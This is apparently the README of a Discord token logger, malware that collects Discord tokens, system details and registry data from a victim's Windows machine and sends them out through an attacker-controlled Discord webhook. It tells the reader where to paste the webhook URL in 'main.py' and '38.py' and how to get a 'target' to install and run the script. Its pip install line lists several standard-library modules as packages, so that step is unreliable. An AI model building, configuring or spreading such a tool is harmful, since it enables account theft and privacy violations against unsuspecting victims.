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Advanced-Token-Logger

An advanced discord token logger that dumps system information, goes through the registry, and more. Once the script is executed and all info is collected, the files will be sent and uploaded through a discord webhook.

How to install

It should install automatically by running "start.py" but just incase that does not work, try installing it manually or making your target install it manually by doing the following commands.

pip3 install re pip3 install shutil pip3 install requests pip3 install socket pip3 install winreg pip3 install pyautogui pip3 install platform pip3 install psutil pip3 install getmac

How to Setup up the token logger

In order for the token logger to be fully functional we must create a discord webhook. Once the webhook is created, we are going to paste our webhook in specific areas in the code.

In the file "main.py" go to line 49 and replace the text with your discord webhook url.

In the file "38.py" go to line 7 and replace the text with your discord webhook url.

In the file "38.py" go to line 76 and replace the text with your discord webhook url.

In the file "38.py" go to line 78 and replace the text with your discord webhook url.

In the file "38.py" go to line 80 and replace the text with your discord webhook url.

In the file "38.py" go to line 82 and replace the text with your discord webhook url.

In the file "38.py" go to line 84 and replace the text with your discord webhook url.

In the file "38.py" go to line 86 and replace the text with your discord webhook url.

In the file "38.py" go to line 88 and replace the text with your discord webhook url.

How to Run

Execute the token logger by double clicking it or doing "python main.py". But before you execute it or make your target execute it, double check that all the requirements have been install via manual installation or by running "start.py". Remember, if "start.py" works and installs everything it will automatically execute "main.py"

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